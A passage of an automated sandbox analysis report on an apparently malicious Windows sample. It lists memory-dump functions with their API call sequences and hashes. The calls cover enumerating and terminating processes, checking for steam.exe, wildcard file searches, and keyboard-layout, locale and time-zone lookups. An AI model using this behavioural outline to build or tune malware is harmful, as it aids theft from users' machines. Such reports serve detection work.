                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 6fb19cfcbbf7ce5cb5418edc41bfb763b5ad6cb896297507626a83b54b3d455e
                                • Instruction ID: b0ee0a93e86a483fcf168390f4add666187522b4ccdb37ce6fca111715537992
                                • Opcode Fuzzy Hash: 6fb19cfcbbf7ce5cb5418edc41bfb763b5ad6cb896297507626a83b54b3d455e
                                • Instruction Fuzzy Hash: FF411A719116168BCB61AF66DDA9FAE77A6FF64300F00512DBC4E97211CF349C418B94
                                Function 00A7A1D8 Relevance: 14.1, Strings: 10, Instructions: 1581COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $r}$Agvy$A}z$D3z{$OnO$R.}$S;w$T"x$XO_$;IL
                                • API String ID: 0-569549136
                                • Opcode ID: 97cb36ac98a6a1a6ae987a9354de6ab15f6feee83b474e320d359dff472ffb14
                                • Instruction ID: 8168dd47b40280cc8420d12aa9994e16093200b6f9baeb83857ca0cf09cf51c8
                                • Opcode Fuzzy Hash: 97cb36ac98a6a1a6ae987a9354de6ab15f6feee83b474e320d359dff472ffb14
                                • Instruction Fuzzy Hash: E0B207F360C604AFE304AE2DEC8567AFBE5EB94320F16893DE6C5C3744EA3558418697
                                Function 006E46A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006E46B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 006E46C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E46DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 006E46ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006E4702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 006E4711
                                • CloseHandle.KERNEL32(00000000), ref: 006E4718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E4726
                                • CloseHandle.KERNEL32(00000000), ref: 006E4731
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 28b11bfd158972276a4003b95dfbe085ea30beaa62ebbe744cd2ac375788a96e
                                • Instruction ID: 80bcffeec7caaff230ce40c4483fec53fcc4a22fd017caa73a987c4231fd985d
                                • Opcode Fuzzy Hash: 28b11bfd158972276a4003b95dfbe085ea30beaa62ebbe744cd2ac375788a96e
                                • Instruction Fuzzy Hash: 51018031602624ABEB215B71DC8DFFA377DFB89B51F000199F949E1280EF749994CBA1
                                Function 006E4610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 006E4628
                                • Process32First.KERNEL32(00000000,00000128), ref: 006E4638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 006E4660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E4672
                                • CloseHandle.KERNEL32(00000000), ref: 006E467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: fc6dcd49bef3bc75e4bf70738c4a413f5d99a37e93b4cb070f7a155aebec9720
                                • Instruction ID: 25780376f496745020fe0e1dba01a4da8b348fcd9ba76cbf7a713849450fdac1
                                • Opcode Fuzzy Hash: fc6dcd49bef3bc75e4bf70738c4a413f5d99a37e93b4cb070f7a155aebec9720
                                • Instruction Fuzzy Hash: 3D018B71602228ABD720AB72AC48FFA77ACEB4A350F0001D5E948D1180EF748A94CAE1
                                Function 006D4B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D4B7F
                                • lstrlen.KERNEL32(006F4CA8), ref: 006D4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4BA7
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006D4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D4BFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 9cad8430d1ef9b7d241929040a64f202ea74f52fbdf321cb1a2cc789177bc977
                                • Instruction ID: 34a6c44e659ba86f67402a3447dc9a79de0dcfbd8768d0841e863bb24286e8b2
                                • Opcode Fuzzy Hash: 9cad8430d1ef9b7d241929040a64f202ea74f52fbdf321cb1a2cc789177bc977
                                • Instruction Fuzzy Hash: 3731D7715215169BCB62AFAAEC99FAE77A6EF90710F00112EF84997351CF34EC018B94
                                Function 00A80BC8 Relevance: 11.7, Strings: 8, Instructions: 1705COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A_$!;&$*=_$2\$8Xr$8Xr$Pm}_$i}w
                                • API String ID: 0-3036884518
                                • Opcode ID: 560f0f3cc12e89860f5e03038998bc8d6aa69c2a0bb4ce3acfdc32cbde63d6ed
                                • Instruction ID: 1981e31771e5c14dd25b20d1ac7c7fba9171baac0a7f760403f14aca07bc47d0
                                • Opcode Fuzzy Hash: 560f0f3cc12e89860f5e03038998bc8d6aa69c2a0bb4ce3acfdc32cbde63d6ed
                                • Instruction Fuzzy Hash: 60B26CF3A0C2049FE3046E2DEC8567ABBE9EF94760F1A463DEAC4C7744E93558058792
                                Function 006E2D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006E71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006E71FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006E2D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006E2DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006E2DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006E2DEC
                                • LocalFree.KERNEL32(00000000), ref: 006E2FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: f99984d0718b973fe5dc331605a05917638bc61bcc18305b643bcb4018e8bfd4
                                • Instruction ID: 93feee45c91f07df1d8d66bb00f3bec53db60df25123ae59568138d967d269ce
                                • Opcode Fuzzy Hash: f99984d0718b973fe5dc331605a05917638bc61bcc18305b643bcb4018e8bfd4
                                • Instruction Fuzzy Hash: 73B11770901355CFC714CF69C948BA9B7F6BB84328F29C1A9D4089B3A2D7769D82CF80
                                Function 00A82706 Relevance: 10.4, Strings: 7, Instructions: 1610COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .>$,}$6S{$g"<$qQs$v?$zB]?
                                • API String ID: 0-2263300472
                                • Opcode ID: 2320583aaa5b14188153bf105a258f2b018664e2f89541f2c6b5dbc54ff5b4bd
                                • Instruction ID: 02e63b3c8ae1bd09d5d0d6b38d74ea59ce2b4af933f48acea31d9bca41a1cef4
                                • Opcode Fuzzy Hash: 2320583aaa5b14188153bf105a258f2b018664e2f89541f2c6b5dbc54ff5b4bd
                                • Instruction Fuzzy Hash: 25B2F5F3A0C2049FE7046E2DEC8567AFBE5EF94320F1A493DEAC5C3744EA7558018696
                                Function 00A74EFF Relevance: 9.1, Strings: 6, Instructions: 1642COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %~{=$8O[=$P&W$jxe$q_m$xpo
                                • API String ID: 0-570918950
                                • Opcode ID: c64625379f90b6e7ec6ae7474b483d55f65971392ec709d5f12d861da57184f2
                                • Instruction ID: c778c21ba43ef4aba06695b4dfdd0076eaf51dcb08d1b2f8d7e5c503e4ab1d25
                                • Opcode Fuzzy Hash: c64625379f90b6e7ec6ae7474b483d55f65971392ec709d5f12d861da57184f2
                                • Instruction Fuzzy Hash: F1B2F6F360C2009FE304AE2DEC8567ABBE9EF94320F1A893DE6C4C7744E67558458697
                                Function 006E2C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006E2C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E2C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 006E2C58
                                • wsprintfA.USER32 ref: 006E2C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 6e4fad7f9a1e06aa3b3f17430880216a08016159091fba000bc0a755f6f1449f
                                • Instruction ID: ffbb782fecd567bfd48d3b5b5c3e938753d7e9c5348fba97b996dd978301e28a
                                • Opcode Fuzzy Hash: 6e4fad7f9a1e06aa3b3f17430880216a08016159091fba000bc0a755f6f1449f
                                • Instruction Fuzzy Hash: 3701F771A00604ABC7188B68DC09F69B76EEB84721F104329F916DB3C0DB74190086D1
                                Function 00A7BBF6 Relevance: 7.9, Strings: 5, Instructions: 1667COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
